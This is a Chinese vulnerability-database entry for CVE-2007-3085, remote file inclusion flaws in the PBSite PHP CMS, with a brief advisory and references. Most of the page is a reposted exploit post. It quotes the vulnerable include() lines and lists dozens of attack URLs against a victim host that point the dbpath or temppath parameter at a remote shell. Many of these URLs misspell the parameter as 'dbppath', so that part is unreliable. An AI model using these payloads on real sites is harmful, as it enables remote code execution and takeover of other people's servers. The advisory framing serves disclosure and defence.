PBSite PHP多个远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1190316 漏洞类型 未知
发布时间 2007-06-06 更新时间 2007-06-06
CVE编号 CVE-2007-3085 CNNVD-ID CNNVD-200706-096
漏洞平台 N/A CVSS评分 7.5
|漏洞来源
https://www.securityfocus.com/bid/86106
https://cxsecurity.com/issue/WLB-2007060039
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200706-096
|漏洞详情
PBSite中存在多个PHP远程文件包含漏洞。远程攻击者可以借助提交到(a)useronline.php,(b)ucp.php,(c)setcookie.php,(d)sendpm.php,(e)search.php,(f)register.php,(g)profile.php,(h)post.php,(i)pmpshow.php,(j)pm.php,(k)ntopic.php,(l)nreply.php,(m)news.php,(n)memberslist.php,(o)logout.php,(p)login.php,(q)index.php,(r)help.php,(s)forum.php,(t)error.php,(u)editpost.php,(v)delpost.php,(w)delpm.php,(x)confirm.php,(y)board.php,(z)admin2.php,(aa)admin.php或(bb)templates/pb/css/formstyles.php的(1)dbpath参数或到(a)useronline.php,(c)setcookie.php,(e)search.php,(f)register.php,(h)post.php,(l)nreply.php,(m)news.php,(o)logout.php,(p)login.php,(q)index.php,(r)help.php,(s)forum.php,(t)error.php,(w)delpm.php,(x)confirm.php或(y)board.php的(2)temppath参数中的一个URL,执行任意的PHP代码。
|漏洞EXP
script:PBSite - PHP Bulletin Site | CMS ====> RFI

url:http://sourceforge.net/project/showfiles.php?group_id=88114

authot:titanichacker (the-modest-pirate (at) hotmail (dot) com [email concealed])

contact: hack-teach.com & mohandko.com & tryag.com
%%%%%%%%%%%%%%%%%%%%%%%%%%%

%%%%%%%%%%%%%%%%%%%%%%%%%%%
bug in:   %%%
%%%%%%%%%%%
./useronline.php
include($dbpath."/settings.php");
include($temppath."/pb/language/lang_".$language.".php");
%%%
./ucp.php
include($dbpath."/settings.php");
include($dbpath."/settings/styles/styles.php");
%%%%%
./setcookie.php
include($temppath."/pb/language/lang_".$language.".php");
include($dbpath.'/settings.php');
%%%%%%%%%%
./sendpm.php
include($dbpath."/settings.php");
%%%%%%%%%%%
./search.php
include($dbpath."/settings.php");
include($dbpath."/settings/styles/styles.php");
include($temppath."/pb/language/lang_".$language.".php");
%%%%%%%%%%
./register.php
include($dbpath."/settings.php");
include($dbpath."/settings/styles/styles.php");
include($temppath."/pb/language/lang_".$language.".php");
%%%%%%%%%%%%
./profile.php
include($dbpath."/settings.php");
include($dbpath."/settings/styles/styles.php");
%%%%%%%%%%%%%
./post.php
include($dbpath."/settings.php");
include($dbpath."/settings/styles/styles.php");
include($temppath."/pb/language/lang_".$language.".php");
include($temppath."/pb/language/lang_".$language.".php");
%%%%%%%%%%%%
./pmpshow.php

include($dbpath."/settings.php");
include($dbpath."/settings/styles/styles.php");
%%%%%%%%%%%%%
./pm.php
include($dbpath."/settings.php");
include($dbpath."/settings/styles/styles.php");
%%%%%%%%%%%%
./ntopic.php
include($dbpath."/settings.php");
include($dbpath."/settings/styles/styles.php");
%%%%%%%%%%%
./nreply.php
include($dbpath."/settings.php");
include($dbpath."/settings/styles/styles.php");
include($temppath."/pb/language/lang_".$language.".php");
include($temppath."/pb/language/lang_".$language.".php");
%%%%%%%%%%
./news.php
include($dbpath."/settings.php");
include($dbpath."/settings/styles/styles.php");
include ($dbpath."/posts/".$cat."_".$fid."_".$pid);
include($temppath."/pb/language/lang_".$language.".php");
%%%%%%%%%%%%%
./memberslist.php
include($dbpath."/settings.php");
include($dbpath."/settings/styles/styles.php");
%%%%%%%%%%%%%%%%
./logout.php
include($dbpath."/settings.php");
include($dbpath."/settings/styles/styles.php");
include ($dbpath."/posts/".$cat."_".$fid."_".$pid);
include($temppath."/pb/language/lang_".$language.".php");
%%%%%%%%%%%%%%%%
./login.php
include($dbpath."/settings.php");
include_once("$temppath/$template/language/lang_$language.php");
include_once("$temppath/$template/language/lang_$language.php");
%%%%%%%%%%%%%%%%%%%%%%%%%
./index.php
include($dbpath."/settings.php");
include_once("$temppath/$template/language/lang_$language.php");
include_once("$temppath/$template/language/lang_$language.php");
%%%%%%%%%%%%%%%%%
./help.php
include($dbpath."/settings.php");
include_once($dbpath."/settings/styles/styles.php");
include("$temppath/$template/language/lang_$language.php");
%%%%%%%%%%%%%
./forum.php
include($dbpath."/settings.php");
include($temppath."/pb/language/lang_$language.php");
include($temppath."/pb/language/lang_".$language.".php");
%%%%%%%%%%%%
./error.php
include($dbpath."/settings.php");
include($temppath."/pb/language/lang_$language.php");
include($temppath."/pb/language/lang_".$language.".php");
%%%%%%%%%%%
./editpost.php
include($dbpath."/settings.php");
%%%%%%%%%%%%
./delpost.php
include($dbpath."/settings.php");
%%%%%%%%%%
./delpm.php
include($dbpath."/settings.php");
include("$temppath/pb/language/lang_$language.php");
%%%%%%%%%%%%
./confirm.php

include($dbpath."/settings.php");

include($temppath."/pb/language/lang_".$language.".php");
%%%%%%%%%%%%%
./board.php
include($dbpath."/settings.php");

include($temppath."/pb/language/lang_".$language.".php");
%%%%%%%%%%%%%%%%
./admin2.php
include($dbpath."/settings.php");
%%%%%%%%%%%%%%%%%%
./admin.php
include($dbpath."/settings.php");
include($dbpath."/settings/styles/styles.php");
%%%%%%%%%%%%%%%%
./templates/pb/css/formstyles.php
include ($dbpath."/settings/styles/styles.php");
%%%%%%%%%%%%%%%%%%%%%%%%%%%

%%%%%%%%%%%%%%%%%%%%%%%%%%%
exploit:%%
%%%%%%%%%
http://victim/path/useronline.php?dbpath=[shell]
http://victim/path/useronline.php?temppath=[shell]
%%%%%
http://victim/path/ucp.php?dbpath=[shell]
%%%%%
http://victim/path/setcookie.php?temppath=[shell]
http://victim/path/setcookie.php?dbppath=[shell]
%%%%%
http://victim/path/sendpm.php?dbppath=[shell]
%%%%%%%
http://victim/path/search.php?dbppath=[shell]
http://victim/path/search.php?temppath=[shell]
%%%%%%%%%
http://victim/path/register.php?dbppath=[shell]
http://victim/path/register.php?temppath=[shell]
%%%%%%%%%%
http://victim/path/profile.php?dbpath=[shell]
%%%%%%%%
http://victim/path/post.php?dbppath=[shell]
http://victim/path/post.php?temppath=[shell]
%%%%%%%%%
http://victim/path/pmpshow.php?dbppath=[shell]
%%%%%%%%%%%
http://victim/path/pm.php?dbppath=[shell]
%%%%%%%%%%%%
http://victim/path/ntopic.php?dbppath=[shell]
%%%%%%%%
http://victim/path/nreply.php?dbppath=[shell]
http://victim/path/nreply.php?temppath=[shell]
%%%%%%%%%%%%
http://victim/path/news.php?dbppath=[shell]
http://victim/path/news.php?temppath=[shell]
%%%%%%%%%%%
http://victim/path/memberslist.php?dbppath=[shell]
%%%%%%%%%%%%%%
http://victim/path/logout.php?dbppath=[shell]
http://victim/path/logout.php?temppath=[shell]
%%%%%%%%%%%%%%%%%%
http://victim/path/login.php?dbppath=[shell]
http://victim/path/login.php?temppath=[shell]
%%%%%%%%%%%%%%%%%
http://victim/path/index.php?dbppath=[shell]
http://victim/path/index.php?temppath=[shell]
%%%%%%%%%%%%%
http://victim/path/help.php?dbppath=[shell]
http://victim/path/help.php?temppath=[shell]
%%%%%%%%%%
http://victim/path/forum.php?dbppath=[shell]
http://victim/path/forum.php?temppath=[shell]
%%%%%%%%%%%
http://victim/path/error.php?dbppath=[shell]
http://victim/path/error.php?temppath=[shell]
%%%%%%%%%%%
http://victim/path/editpost.php?dbppath=[shell]
%%%%%%%%%%
http://victim/path/delpost.php?dbppath=[shell]
%%%%%%%%%%%
http://victim/path/delpm.php?dbppath=[shell]
http://victim/path/delpm.php?temppath=[shell]
%%%%%%%%%%%
http://victim/path/confirm.php?dbppath=[shell]
http://victim/path/confirm.php?temppath=[shell]
%%%%%%%%%%%
http://victim/path/board.php?dbppath=[shell]
http://victim/path/board.php?temppath=[shell]
%%%%%%%%%%%
http://victim/path/admin2.php?dbppath=[shell]
%%%%%%%%%%%
http://victim/path/admin.php?dbppath=[shell]
%%%%%%%%%%%%
http://victim/path/templates/pb/css/formstyles.php?dbpath=[shell]
%%%%%%%%%%%%%%%%%%%%%%%%%%%%

%%%%%%%%%%%%%%%%%%%%
thanx
%%%%%%%%%
         cold-zero & mohandko & tryag & arb-hawk & drbaka & kof2002 & 
milw0rm & xp10
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%
|受影响的产品
PBSite PBSite 0
|参考资料

来源:XF
名称:pbsite-dbpathtemppath-file-include(34675)
链接:http://xforce.iss.net/xforce/xfdb/34675
来源:BUGTRAQ
名称:20070602PBSite-PHPBulletinSite|CMS====>RFI
链接:http://www.securityfocus.com/archive/1/archive/1/470347/100/0/threaded
来源:BUGTRAQ
名称:20070601PBSite-PHPBulletinSite|CMS====>RFI
链接:http://www.securityfocus.com/archive/1/archive/1/470239/100/0/threaded
来源:OSVDB
名称:38786
链接:http://osvdb.org/38786
来源:OSVDB
名称:38785
链接:http://osvdb.org/38785
来源:OSVDB
名称:38784
链接:http://osvdb.org/38784
来源:OSVDB
名称:38783
链接:http://osvdb.org/38783
来源:OSVDB
名称:38782
链接:http://osvdb.org/38782
来源:OSVDB
名称:38781
链接:http://osvdb.org/38781
来源:OSVDB
名称:38780
链接:http://osvdb.org/38780
来源:OSVDB
名称:38779
链接:http://osvdb.org/38779
来源:OSVDB
名称:38778
链接:http://osvdb.org/38778
来源:OSVDB
名称:38777
链接:http://osvdb.org/38777
来源:OSVDB
名称:38776
链接:http://osvdb.org/38776
来源:OSVDB
名称:38775
链接:http://osvdb.org/38775
来源:OSVDB
名称:38774
链接:http://osvdb.org/38774
来源:OSVDB
名称:38773
链接:http://osvdb.org/38773
来源:OSVDB
名称:38772
链接:http:/